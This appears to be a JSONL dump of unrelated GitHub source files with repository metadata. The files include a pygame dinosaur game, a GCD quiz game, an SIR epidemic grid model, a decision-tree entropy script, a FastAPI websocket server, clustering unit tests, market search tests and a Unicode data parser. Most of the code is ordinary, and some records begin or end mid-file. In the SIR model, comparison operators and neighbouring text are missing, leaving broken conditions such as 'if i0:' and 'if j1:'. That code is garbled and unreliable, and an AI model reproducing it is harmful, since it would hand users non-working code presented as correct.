sess.run(w))\nprint('b: ', sess.run(b))\n\n","repo_name":"czpczpczp/py3.8-TF2.4","sub_path":"DL-tensorflow/3.4.3 tensorflow.py","file_name":"3.4.3 tensorflow.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22953368411","text":"# -*- coding: utf-8 -*-\nfrom math import sin, factorial, fabs\n\nx=0.0\nj=0\nresult=0.0\nwhile 1:\n n = int (raw_input(\"Введите максимальное значение: \"))# ввод n - стоп цикла\n if n%2 and n>0: # проверка на вшивость (остаток от деления и нуль)\n break\nwhile 1:\n E = float (raw_input (\"Введите значение точности: \"))\n if E > 0:\n break\nprint (\"=================================\")\nprint (\"n\\t X max\\t\")\nprint (\"---------------------------------\")\nfor t in range(1, n+1, 2):\n x = 0.0\n for i in range (1000):\n result = 0.0\n j = 0 # коэф. знака\n for r in range(1, t+1, 2):\n result+= ((-1)**j)*((x**r)/factorial(r))# ** - степень\n j = j+1\n if fabs (sin(x) - result) > E: # модуль; точность\n x-=0.1\n print(\"%i --\\t %f\\t\" %(t,x))\n break\n else:\n x+=0.1\nprint(\"=================================\")\n","repo_name":"hospitaler17/NumMeth","sub_path":"sin/sin.py","file_name":"sin.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21338047524","text":"import random\nimport pygame\nimport pygame.freetype\n\n# Создание объекта библиотеки\npygame.init()\n\nscreen = pygame.display.set_mode((900, 500)) # Установка размера окна\npygame.display.set_caption('Dino game') # Название окна\nclock = pygame.time.Clock()\n\nfont = pygame.freetype.Font(None, 40) # Шрифт\n\n# Загрузка спрайтов\ncactus_image = pygame.image.load('images/cactus.png')\ncactus_image = pygame.transform.scale(cactus_image, (50, 80))\ndino_image = pygame.image.load('images/dino.png')\ndino_image = pygame.transform.scale(dino_image, (100, 100))\nground_image = pygame.image.load('images/ground.png')\nground_image = pygame.transform.scale(ground_image, (800, 142))\n\n# Объединение спрайтов в группы\nground_group = pygame.sprite.Group()\ncactus_group = pygame.sprite.Group()\n\n\nground_event = pygame.USEREVENT\ncactus_event = pygame.USEREVENT + 1\npygame.time.set_timer(ground_event, 2000)\npygame.time.set_timer(cactus_event, 6000)\n\n\nclass Ground(pygame.sprite.Sprite):\n '''Поверхность'''\n def __init__(self, image, position):\n super().__init__()\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.center = position\n\n def update(self):\n self.rect.x -= 3\n if self.rect.right < 0:\n self.kill()\n\n\nclass Cactus(pygame.sprite.Sprite):\n def __init__(self, image, position):\n super().__init__()\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.center = position\n\n def update(self):\n self.rect.x -= 3\n if self.rect.right < 0:\n \"\"\"Проверка коллизии (сопрекосновения) кактуса и дино\"\"\"\n self.kill()\n dino.score += 1\n if self.rect.colliderect(dino.rect):\n dino.game_status = 'Menu'\n\n\nclass Dino:\n def __init__(self, image, position):\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.center = position\n self.y = 0\n self.step = 6\n self.max_jump = 60\n self.in_jump = False\n self.score = 0\n self.game_status = 'Game'\n\n def jump(self):\n if self.in_jump:\n if self.y < self.max_jump:\n self.y += 1\n self.rect.y -= self.step\n elif self.y < self.max_jump * 2:\n self.y += 1\n self.rect.y += self.step\n else:\n self.in_jump = False\n self.y = False\n\n def draw(self):\n screen.blit(self.image, self.rect)\n\n# Размеры\ndino = Dino(dino_image, (100, 400))\ng = Ground(ground_image, (300, 450))\nground_group.add(g)\ng = Ground(ground_image, (900, 450))\nground_group.add(g)\nrunning = True\n\nwhile running:\n \"\"\"Управление\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n dino.in_jump = True\n if event.type == ground_event:\n g = Ground(ground_image, (900, 450))\n ground_group.add(g)\n if event.type == cactus_event:\n pygame.time.set_timer(cactus_event, random.randint(6000, 10000))\n c = Cactus(cactus_image, (910, 400))\n cactus_group.add(c)\n\n screen.fill((255, 255, 255))\n if dino.game_status == 'Game':\n ground_group.update()\n ground_group.draw(screen)\n cactus_group.update()\n cactus_group.draw(screen)\n dino.jump()\n dino.draw()\n font.render_to(screen, (850, 50), str(dino.score), (0, 0, 0))\n else:\n font.render_to(screen, (450, 200), 'Game over', (0, 0, 0))\n pygame.display.flip()\n clock.tick(60)\n","repo_name":"Dragonfly774/dinoEgorka","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31077378135","text":"\"\"\"The module contains the rules of the game and its functions.\"\"\"\nfrom random import randint\n\nRULES = 'Find the greatest common divisor of given numbers.'\nBOUNDS = (0, 100)\n\n\ndef get_gcd(number_one, number_two):\n \"\"\"\n Calculate the greatest common divisor.\n\n Parameters:\n number_one: int,\n number_two: int\n\n Returns:\n greatest common divisor.\n \"\"\"\n while number_one != 0 and number_two != 0:\n if number_one > number_two:\n number_one %= number_two\n else:\n number_two %= number_one\n return number_one + number_two\n\n\ndef get_game_data():\n \"\"\"\n Generate question number and return correct answer.\n\n Returns:\n cor_answer,\n question_string.\n \"\"\"\n num1 = randint(*BOUNDS)\n num2 = randint(*BOUNDS)\n quest_number = get_gcd(num1, num2)\n return str(quest_number), '{0} {1}'.format(num1, num2)\n","repo_name":"Valerii-Denisov/python-project-lvl1","sub_path":"brain_games/games/gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27367185058","text":"'''\n SIR model over two dimensional grid \n nodes are located on a two-dimensional grid\n each node is connected to the closest neighbors of distance d (d is a parameter)\n'''\nimport numpy as np\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\nimport matplotlib.pyplot as plt \nimport os\nimport pickle\nfrom sklearn.linear_model import LinearRegression\nfrom mpl_toolkits.mplot3d import Axes3D\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\nimport argparse\n\ndef eval_AI(I, d):\n '''\n computing the summation \\sum_j A_ij I_j \n A_ij is non-zero when the node i and j are neighbors\n '''\n (nn,) = np.shape(I)\n AI = np.zeros(nn)\n\n for i in range(n):\n for j in range(n):\n if i>0:\n AI[i*n+j] += I[(i-1)*n+j]\n if i0: \n AI[i*n+j] += I[i*n+(j-1)] \n if j1:\n AI[i*n+j] += I[(i-2)*n+j]\n if i1: \n AI[i*n+j] += I[i*n+(j-2)] \n if j= 17].groupby(['Species'])['Species'].count()\n\nlength20_bugs = bugs[bugs['Length (mm)'] < 20].groupby(['Species'])['Species'].count()\nnot_length20_bugs = bugs[bugs['Length (mm)'] >= 20].groupby(['Species'])['Species'].count()\n\nprint(\"\\nspecies, colors, and lengths are of type {}\".format(type(species)))\n\n# --------------------------------------------------------------------\n\nimport math\n\ndef entropy(elements):\n \n counts = list()\n counts_sum = 0\n entropy = 0\n \n for element in elements.iteritems():\n counts.append(element[1]) # put all counts in a list\n counts_sum += element[1] # add all counts\n \n #print(\"elements = {}\".format(elements))\n #print(\"counts = {}, sum = {}\".format(counts, counts_sum))\n \n for count in counts:\n probability = count / counts_sum\n entropy -= probability*math.log2(probability)\n \n return pd.Series(data = [counts_sum, entropy], index = ['total', 'entropy'])\n\ndef information_gain(parent, child1, child2):\n p = entropy(parent)\n num_p = p['total']\n p_entropy = p['entropy']\n \n c1 = entropy(child1)\n num_c1 = c1['total']\n c1_entropy = c1['entropy']\n \n c2 = entropy(child2)\n num_c2 = c2['total']\n c2_entropy = c2['entropy']\n \n return p_entropy - (num_c1/num_p*c1_entropy + num_c2/num_p*c2_entropy)\n\n# --------------------------------------------------------------------\n\nprint(\"Split Blue Information Gain = {}\".format(round(information_gain(species, blue_bugs, not_blue_bugs), 5)))\nprint(\"Split Brown Information Gain = {}\".format(round(information_gain(species, brown_bugs, not_brown_bugs), 5)))\nprint(\"Split Green Information Gain = {}\".format(round(information_gain(species, green_bugs, not_green_bugs), 5)))\nprint(\"Split < 17 Information Gain = {}\".format(round(information_gain(species, length17_bugs, not_length17_bugs), 5)))\nprint(\"Split < 20 Information Gain = {}\".format(round(information_gain(species, length20_bugs, not_length20_bugs), 5)))","repo_name":"ChristopheBunn/Udacity-Data-Scientist-Nanodegree","sub_path":"Scripts/bugs.py","file_name":"bugs.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30536091141","text":"import asyncio\nimport logging\n\nfrom collections import defaultdict\nfrom typing import Dict, Set\n\nimport asyncpg\nimport websockets\n\nfrom fastapi import FastAPI, WebSocket\n\nfrom subscriptions import Subscription, SubscriptionsManager\nfrom exceptions import InvalidRequestException\nfrom models import Action, Message, Metric\nfrom repo import AssetsRepo\nfrom settings import DB_DSN\n\nlogger = logging.getLogger(__name__)\n\n\nasync def get_client_message(websocket: WebSocket, queue: asyncio.Queue) -> Message:\n try:\n async for data in websocket.iter_json():\n await queue.put(Message(**data))\n except Exception as exc:\n logger.error(f'Invalid request. Error: {exc}', exc_info=True)\n raise InvalidRequestException\n\n\nasync def process_client_message(\n subs_manager: SubscriptionsManager, websocket: WebSocket, queue: asyncio.Queue\n) -> None:\n while True:\n if queue.empty():\n await asyncio.sleep(0)\n else:\n client_message: Message = await queue.get()\n if client_message.action == Action.assets:\n data = await subs_manager.assets_repo.get_assets_list()\n msg = Message(action=Action.assets, message={'assets': data})\n await websocket.send_json(msg.dict())\n elif client_message.action == Action.subscribe:\n asset_id = int(client_message.message['assetId'])\n if websocket in subs_manager.subscribers and subs_manager.subscribers[websocket].asset_id != asset_id:\n await subs_manager.resubscribe_client(websocket, asset_id)\n else:\n await subs_manager.subscribe_client(websocket, asset_id)\n\n\napp = FastAPI()\n\n\n@app.on_event('startup')\nasync def start_subs_processing() -> None:\n pool = await asyncpg.create_pool(DB_DSN)\n app.assets_storage = AssetsRepo(pool)\n app.subs_manager = SubscriptionsManager(app.assets_storage)\n asyncio.create_task(app.subs_manager.process_subscriptions())\n\n\n@app.websocket(\"/ws\")\nasync def websocket_endpoint(websocket: WebSocket):\n await websocket.accept()\n queue = asyncio.Queue()\n logger.info(f'new client at: {websocket}')\n while True:\n try:\n await asyncio.gather(\n get_client_message(websocket, queue),\n process_client_message(websocket.app.subs_manager, websocket, queue),\n )\n except InvalidRequestException:\n return websocket\n except websockets.exceptions.ConnectionClosedError as exc:\n print(f'Client at websocket {websocket} have closed the connection')\n logger.info(f'Client at websocket {websocket} have closed the connection')\n return websocket\n except Exception as exc:\n logger.exception(f'Unknown error occurred {exc}', exc_info=True)\n return websocket\n\n\nif __name__ == '__main__':\n import uvicorn\n\n # uvicorn.run(\"main:app\", port=8080, log_level='info', reload=True, loop='uvloop', host='0.0.0.0')\n uvicorn.run(\"main:app\", port=8080, log_level='info', loop='uvloop', host='0.0.0.0')\n","repo_name":"kestkest/metrics_app","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3803336327","text":"import time\n\nfrom contracts.contract import Contract\nfrom evaluation.spec_generator import spec_generator\nfrom evaluation.utils import save_lists_to_files\nfrom goals.goal import Goal\nfrom goals.library import Library\nfrom logic.specification.temporal import LTL\nfrom repair.utils.efficient_library import get_candidate_composition_efficient\nfrom repair.utils.library import get_candidate_composition\n\n\ndef get_search_time(spec: LTL, lib_specs: list[LTL]) -> tuple[float, int, int]:\n spec_contract: Contract = Contract(spec, _skip_sat=True)\n spec_goal: Goal = Goal(spec_contract)\n\n library_contracts: list[Contract] = [Contract(spec, _skip_sat=True) for spec in lib_specs]\n library_goals: list[Goal] = [Goal(contract) for contract in library_contracts]\n\n # library = Library(set(library_goals))\n library = {g.id: g for g in library_goals}\n time_elapsed, n_candidates, similarity_score = get_candidate_composition_efficient(library, spec_goal, evaluation=True)\n\n return time_elapsed, n_candidates, similarity_score\n\n\ndef gen_times_for(min_clauses: int = 1, max_clauses: int = 500):\n x = []\n ya = []\n yb = []\n for i in range(min_clauses, max_clauses):\n spec, specs = spec_generator(i)\n spec_synth_time, library_synth_time = get_search_time(spec, specs)\n x.append(i)\n ya.append(spec_synth_time)\n yb.append(library_synth_time)\n save_lists_to_files(x, ya, yb)\n\n\nif __name__ == '__main__':\n gen_times_for()\n","repo_name":"pierg/cr3","sub_path":"evaluation/generate_library_data.py","file_name":"generate_library_data.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20864984219","text":"\"\"\" ps2_tests.py\n\nContains tests of the implementations:\n- kmeans\n- em_gmm\n- plot_gmm_solution\n- kmeans_agglo\n- agglo_dendro\n\n(c) Felix Brockherde, TU Berlin, 2013-2016\n\"\"\"\nimport unittest\n\nimport numpy as np\nimport scipy.linalg as la\nimport pylab as pl\nimport copy\n\nimport ps2_implementation as imp\n\nclass TestSheet2(unittest.TestCase):\n X = np.array([[0., 1., 1., 10., 10.25, 11., 10., 10.25, 11.],\n [0., 0., 1., 0., 0.5, 0., 5., 5.5, 5.]]).T\n perfect_r = [1,0,1,2,2,1,2,2,2]\n def test_kmeans(self):\n worked1 = False\n worked2 = False\n\n for _ in range(10):\n mu, r, _ = imp.kmeans(self.X, k=3)\n if (r[0]==r[1]==r[2]!=r[3] and r[3]==r[4]==r[5]!=r[6] and r[6]==r[7]==r[8]):\n worked1 = True\n\n # test one cluster center\n if (np.linalg.norm(mu[0] - [10.41666, 0.1666]) < 0.1 or\n np.linalg.norm(mu[1] - [10.41666, 0.1666]) < 0.1 or\n np.linalg.norm(mu[2] - [10.41666, 0.1666]) < 0.1):\n worked2 = True\n if worked1 and worked2:\n break\n if not worked1:\n raise AssertionError('test_kmeans cluster assignments are wrong.')\n if not worked2:\n raise AssertionError('test_kmeans did not find the correct cluster center.')\n\n def test_em_gmm(self):\n worked1 = False\n worked2 = False\n for _ in range(10):\n mpi, mu, sigma, _ = imp.em_gmm(self.X, k=3)\n\n # test one cluster center\n if (np.linalg.norm(mu[0] - [10.41666, 0.1666]) < 0.1 or\n np.linalg.norm(mu[1] - [10.41666, 0.1666]) < 0.1 or\n np.linalg.norm(mu[2] - [10.41666, 0.1666]) < 0.1):\n worked1 = True\n if ((np.abs(np.linalg.det(sigma[0]) - 0.03703) < 0.001 or\n np.abs(np.linalg.det(sigma[1]) - 0.03703) < 0.001 or\n np.abs(np.linalg.det(sigma[2]) - 0.03703) < 0.001) and\n (np.abs(np.linalg.det(sigma[0]) - 0.00925) < 0.001 or\n np.abs(np.linalg.det(sigma[1]) - 0.00925) < 0.0001 or\n np.abs(np.linalg.det(sigma[2]) - 0.00925) < 0.0001)):\n worked2 = True\n if worked1 and worked2:\n imp.plot_gmm_solution(self.X, mu, sigma)\n break\n\n if not worked1:\n raise AssertionError('test_em_gmm did not find the correct cluster center.')\n if not worked2:\n raise AssertionError('test_em_gmm did not find the correct cluster center.')\n\n def test_agglo(self):\n worked = False\n for _ in range(10):\n mu, r, _ = imp.kmeans(self.X, k=3)\n r = r.flatten()\n r_ = copy.deepcopy(r)\n R, kmloss, mergeidx = imp.kmeans_agglo(self.X, r_)\n mergeidx = np.array(mergeidx, dtype=int)\n if set([int(r[3]), int(r[6])]) == set(mergeidx[0, :]):\n worked = True\n imp.agglo_dendro(kmloss, mergeidx)\n break\n if not worked:\n raise AssertionError('test_agglo: the first merge is not correct.')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"qiaw99/Machine-Learning-Lab","sub_path":"problem_set2/stubs/ps2_tests.py","file_name":"ps2_tests.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"184159219","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner # noqa\n\nfrom core.testcase import TestCase, main\nfrom core.types import HyperCategory, HyperCategoryType, MnPlace, Model, Offer, Picture, Shop\nfrom core.matcher import Absent, ElementCount\n\n\nclass T(TestCase):\n @classmethod\n def prepare(cls):\n cls.settings.default_search_experiment_flags += ['market_new_cpm_iterator=0']\n cls.settings.default_search_experiment_flags += ['market_filter_offers_with_model_without_sku=0']\n\n cls.index.hypertree += [\n HyperCategory(hid=1, output_type=HyperCategoryType.GURU, show_offers=True),\n HyperCategory(hid=2, output_type=HyperCategoryType.GURU, show_offers=True),\n ]\n\n cls.index.models += [\n Model(hyperid=101, hid=1, title='GURU model', ts=10100),\n Model(hyperid=102, hid=1, title='GURUDUMMY model', ts=10200, is_guru_dummy=True),\n Model(hyperid=103, hid=2, title='GURU model from other category', ts=10300),\n ]\n\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 10100).respond(0.6)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 10200).respond(0.5)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 10300).respond(0.4)\n\n cls.index.shops += [Shop(fesh=1, priority_region=213), Shop(fesh=2, priority_region=213)]\n\n cls.index.offers += [\n Offer(title='offer 1 for GURU model', hyperid=101, fesh=1),\n Offer(title='offer 2 for GURU model', hyperid=101, fesh=2),\n Offer(title='offer 1 for GURUDUMMY model', hyperid=102, fesh=1),\n Offer(\n title='offer 2 for GURUDUMMY model',\n hyperid=102,\n fesh=2,\n picture=Picture(picture_id='uS6z5i755IOLmUXx1CKyOQ', width=100, height=100, group_id=1),\n ),\n # Для проверки, что не схлопываются офферы для одной модели из одного магазина.\n # Но обязательно надо указать картинку, т.к иначе дубли с одинаковыми картинками отсеиваются в TFilterByPicture\n Offer(\n title='offer 3 for GURUDUMMY model',\n hyperid=102,\n fesh=2,\n picture=Picture(picture_id='oxGBOkyJnAGkH5rdYHRSQw', width=100, height=100, group_id=1),\n ),\n Offer(title='offer 1 for model 103', hyperid=103, fesh=1),\n ]\n\n def test_filtered_out_dummy_model(self):\n '''Проверка, что без show_dummy_models GURU_DUMMY модели игнорятся, а их офферы не привязываются к моделям'''\n\n response = self.report.request_json(\n 'debug=1&place=prime&hid=1&allow-collapsing=1&rids=213' '&rearr-factors=market_metadoc_search=no'\n )\n self.assertFragmentIn(\n response,\n {\n 'search': {\n 'total': 4,\n 'totalOffers': 3,\n 'totalModels': 1,\n 'results': [\n {\n 'entity': 'product',\n 'titles': {'raw': 'GURU model'},\n 'offers': {'count': 2},\n },\n {\n 'entity': 'offer',\n 'titles': {'raw': 'offer 1 for GURUDUMMY model'},\n 'model': Absent(),\n 'shop': {'id': 1},\n },\n {\n 'entity': 'offer',\n 'titles': {'raw': 'offer 2 for GURUDUMMY model'},\n 'model': Absent(),\n 'shop': {'id': 2},\n },\n {\n 'entity': 'offer',\n 'titles': {'raw': 'offer 3 for GURUDUMMY model'},\n 'model': Absent(),\n 'shop': {'id': 2},\n },\n ],\n },\n 'debug': {'brief': {'filters': {'MODEL_IS_DUMMY': 1}}},\n },\n allow_different_len=False,\n )\n\n def test_dummy_model_in_prime_result(self):\n '''Проверка, что c show_dummy_models GURU_DUMMY модели показываются,\n и офферы к ним привязываются\n '''\n\n response = self.report.request_json(\n 'debug=1&place=prime&hid=1&allow-collapsing=1&rids=213&rearr-factors=show_dummy_models=1'\n '&rearr-factors=market_metadoc_search=no'\n )\n self.assertFragmentIn(\n response,\n {\n 'search': {\n 'total': 2,\n 'totalOffers': 0,\n 'totalModels': 2,\n 'results': [\n {\n 'entity': 'product',\n 'titles': {'raw': 'GURU model'},\n 'offers': {'count': 2},\n },\n {\n 'entity': 'product',\n 'titles': {'raw': 'GURUDUMMY model'},\n 'offers': {'count': 3},\n },\n ],\n },\n 'debug': {'brief': {'filters': ElementCount(0)}},\n },\n )\n\n def test_productoffers(self):\n req = 'place=productoffers&hyperid=102&rids=213'\n for exp in ('', '&rearr-factors=show_dummy_models=1'):\n response = self.report.request_json(req + exp)\n self.assertFragmentIn(\n response,\n {\n 'totalOffers': 3,\n 'results': [\n {\n 'entity': 'offer',\n 'model': {'id': 102},\n 'titles': {'raw': 'offer 1 for GURUDUMMY model'},\n 'shop': {'id': 1},\n },\n {\n 'entity': 'offer',\n 'model': {'id': 102},\n 'titles': {'raw': 'offer 2 for GURUDUMMY model'},\n 'shop': {'id': 2},\n },\n {\n 'entity': 'offer',\n 'model': {'id': 102},\n 'titles': {'raw': 'offer 3 for GURUDUMMY model'},\n 'shop': {'id': 2},\n },\n ],\n },\n )\n\n def test_modelinfo(self):\n req = 'place=modelinfo&hyperid=101&hyperid=102&rids=213'\n for exp in (True, False):\n response = self.report.request_json(req + ('&rearr-factors=show_dummy_models=1' if exp else ''))\n self.assertFragmentIn(\n response,\n {\n 'results': [\n {\n 'entity': 'product',\n 'id': 101,\n 'titles': {'raw': 'GURU model'},\n 'categories': [{'id': 1, 'isLeaf': True}],\n 'offers': {'count': 2},\n },\n {\n 'entity': 'product',\n 'id': 102,\n 'titles': {'raw': 'GURUDUMMY model'},\n 'categories': [{'id': 1, 'isLeaf': True}],\n 'offers': {'count': 3},\n },\n ]\n },\n )\n\n def wizard_title_text_obj(self, title):\n return {'title': {'text': {'__hl': {'text': title}}}}\n\n def test_filtered_out_implicit_models_in_parallel(self):\n response = self.report.request_bs('place=parallel&text=model&rearr-factors=market_parallel_feature_log_rate=1')\n self.assertFragmentIn(\n response,\n {\n 'market_implicit_model': [\n {\n 'model_count': '2',\n 'offer_count': 6,\n 'showcase': {\n 'items': [\n self.wizard_title_text_obj('GURU model'),\n self.wizard_title_text_obj('GURU model from other category'),\n ]\n },\n }\n ],\n 'market_offers_wizard': [{'offer_count': 6}],\n },\n preserve_order=True,\n allow_different_len=False,\n )\n\n self.feature_log.expect(model_id=101, position=1)\n self.feature_log.expect(model_id=103, position=2)\n\n def test_dummy_implicit_models_in_parallel(self):\n response = self.report.request_bs(\n 'place=parallel&text=model&rearr-factors=show_dummy_models=1;market_parallel_feature_log_rate=1'\n )\n self.assertFragmentIn(\n response,\n {\n 'market_implicit_model': [\n {\n 'model_count': '3',\n 'offer_count': 6,\n 'showcase': {\n 'items': [\n self.wizard_title_text_obj('GURU model'),\n self.wizard_title_text_obj('GURUDUMMY model'),\n self.wizard_title_text_obj('GURU model from other category'),\n ]\n },\n }\n ],\n 'market_offers_wizard': [{'offer_count': 6}],\n },\n preserve_order=True,\n allow_different_len=False,\n )\n\n self.feature_log.expect(model_id=101, position=1)\n self.feature_log.expect(model_id=102, position=2)\n self.feature_log.expect(model_id=103, position=3)\n\n def test_not_implicit_models_in_parallel(self):\n req = 'place=parallel&text=GURUDUMMY'\n response = self.report.request_bs(req)\n self.assertFragmentIn(\n response,\n {'market_implicit_model': Absent(), 'market_model': Absent(), 'market_offers_wizard': [{'offer_count': 3}]},\n )\n\n response = self.report.request_bs(req + '&rearr-factors=show_dummy_models=1')\n self.assertFragmentIn(\n response,\n {\n 'market_implicit_model': Absent(), # должно быть не менее 2 моделей\n 'market_model': [\n {\n 'title': {\"__hl\": {\"text\": \"GURUDUMMY model\", \"raw\": True}},\n 'categoryId': 1,\n 'showcase': {\n \"items\": ElementCount(2)\n }, # найденно 3 оффера, но 2 из них из одного магазина, а такие схлопываются\n }\n ],\n 'market_offers_wizard': [{'offer_count': 3}],\n },\n allow_different_len=False,\n )\n\n def test_skip_dummy_model_docs(self):\n '''Проверка флага skip_dummy_model_docs_at_text_search. При нем на текстовом поиске должны отсеиваться документы-модели.\n Но при этом сами модели не должны пропасть из выдачи, а образоваться из схлопнутых офферов.\n '''\n\n def gen_req(allow_collapsing, skip_dummy_model_doc):\n req = 'place=prime&text=model&hid=1&allow-collapsing={}&rids=213&debug=1&rearr-factors=show_dummy_models=1;market_metadoc_search=no'.format(\n allow_collapsing\n )\n return req + ';skip_dummy_model_docs_at_text_search=1' if skip_dummy_model_doc else req\n\n product_101_json = {\n 'entity': 'product',\n 'slug': 'guru-model',\n 'id': 101,\n 'offers': {'count': 2},\n 'debug': {'isCollapsed': False},\n }\n\n for allow_collapsing in (1, 0):\n for skip_dummy_model_doc in (False, True):\n response = self.report.request_json(gen_req(allow_collapsing, skip_dummy_model_doc))\n if skip_dummy_model_doc:\n filter_debug = {'debug': {'brief': {'filters': {'MODEL_IS_DUMMY': 1}}}}\n self.assertFragmentIn(response, filter_debug)\n\n # модель 101 будет всегда, а модель 102 пропадет при skip_dummy_model_docs_at_text_search=1 + allow-collapsing=0\n total_models = 2 if not skip_dummy_model_doc or allow_collapsing else 1\n total_offers = 5 if not allow_collapsing else 0\n\n self.assertFragmentIn(\n response,\n {\n 'total': total_models + total_offers,\n 'totalModels': total_models,\n 'totalOffers': total_offers,\n 'results': ElementCount(total_models + total_offers),\n },\n )\n if total_models == 2:\n self.assertFragmentIn(\n response,\n [\n product_101_json,\n {\n 'entity': 'product',\n 'slug': 'gurudummy-model',\n 'id': 102,\n 'offers': {'count': 3},\n 'debug': {'isCollapsed': skip_dummy_model_doc},\n },\n ],\n )\n else:\n self.assertFragmentIn(response, product_101_json)\n self.assertFragmentNotIn(response, {'entity': 'product', 'id': 102})\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_dummy_models.py","file_name":"test_dummy_models.py","file_ext":"py","file_size_in_byte":14308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36722386267","text":"\"\"\"Additive rules display URI\n\nRevision ID: d0717332cec6\nRevises: 8f8083a8ad61\nCreate Date: 2019-05-08 10:02:43.067332\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd0717332cec6'\ndown_revision = '8f8083a8ad61'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column('additive_rule_links', sa.Column('display_uri', sa.String(length=255), nullable=True))\n\n\ndef downgrade():\n op.drop_column('additive_rule_links', 'display_uri')\n","repo_name":"mitmedialab/gobo","sub_path":"migrations/versions/d0717332cec6_additve_rules_display_uri.py","file_name":"d0717332cec6_additve_rules_display_uri.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"72"} +{"seq_id":"31593048537","text":"from typing import List\n\n\nclass Solution:\n def solve(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n if len(board) is 0: return\n width = len(board[0]) - 1\n height = len(board) - 1\n def help(x: int, y: int):\n if x < 0 or x > height or y < 0 or y > width:\n return\n if board[x][y] is \"O\":\n board[x][y] = \"g\"\n help(x - 1, y)\n help(x, y - 1)\n help(x + 1, y)\n help(x, y + 1)\n\n for i in range(width + 1):\n if board[0][i] is \"O\":\n help(0, i)\n if board[height][i] is \"O\":\n help(height, i)\n for i in range(1, height):\n if board[i][0] is \"O\":\n help(i, 0)\n if board[i][width] is \"O\":\n help(i, width)\n\n print(board)\n for i in range(width + 1):\n for j in range(height + 1):\n if board[j][i] is \"O\":\n board[j][i] = \"X\"\n elif board[j][i] is \"g\":\n board[j][i] = \"O\"\n\nboard = [[\"X\",\"O\",\"X\",\"O\",\"X\",\"O\"],\n [\"O\",\"X\",\"O\",\"X\",\"O\",\"X\"],\n [\"X\",\"O\",\"X\",\"O\",\"X\",\"O\"],\n [\"O\",\"X\",\"O\",\"X\",\"O\",\"X\"]]\n\nsolution = Solution()\nsolution.solve(board)\nprint(board)","repo_name":"zhiwilliam/geekcoding","sub_path":"src/1-500/130/SurroundedRegions.py","file_name":"SurroundedRegions.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"21976268859","text":"import sys\nimport re\nimport argparse\n\n# Dictionary holding the entire contents of the UnicodeData.txt file\n#\n# Contents of this dictionary look like this:\n#\n# {0: {'category': 'Cc',\n# 'title': None,\n# 'digit': '',\n# 'name': '',\n# 'bidi': 'BN',\n# 'combining': '0',\n# 'comment': '',\n# 'oldname': 'NULL',\n# 'decomposition': '',\n# 'upper': None,\n# 'mirrored': 'N',\n# 'lower': None,\n# 'decdigit': '',\n# 'numeric': ''},\n# …\n# }\nUNICODE_ATTRIBUTES = {}\n\n# Dictionary holding the entire contents of the EastAsianWidths.txt file\n#\n# Contents of this dictionary look like this:\n#\n# {0: 'N', … , 45430: 'W', …}\nEAST_ASIAN_WIDTHS = {}\n\ndef fill_attribute(code_point, fields):\n '''Stores in UNICODE_ATTRIBUTES[code_point] the values from the fields.\n\n One entry in the UNICODE_ATTRIBUTES dictionary represents one line\n in the UnicodeData.txt file.\n\n '''\n UNICODE_ATTRIBUTES[code_point] = {\n 'name': fields[1], # Character name\n 'category': fields[2], # General category\n 'combining': fields[3], # Canonical combining classes\n 'bidi': fields[4], # Bidirectional category\n 'decomposition': fields[5], # Character decomposition mapping\n 'decdigit': fields[6], # Decimal digit value\n 'digit': fields[7], # Digit value\n 'numeric': fields[8], # Numeric value\n 'mirrored': fields[9], # mirrored\n 'oldname': fields[10], # Old Unicode 1.0 name\n 'comment': fields[11], # comment\n # Uppercase mapping\n 'upper': int(fields[12], 16) if fields[12] else None,\n # Lowercase mapping\n 'lower': int(fields[13], 16) if fields[13] else None,\n # Titlecase mapping\n 'title': int(fields[14], 16) if fields[14] else None,\n }\n\ndef fill_attributes(filename):\n '''Stores the entire contents of the UnicodeData.txt file\n in the UNICODE_ATTRIBUTES dictionary.\n\n A typical line for a 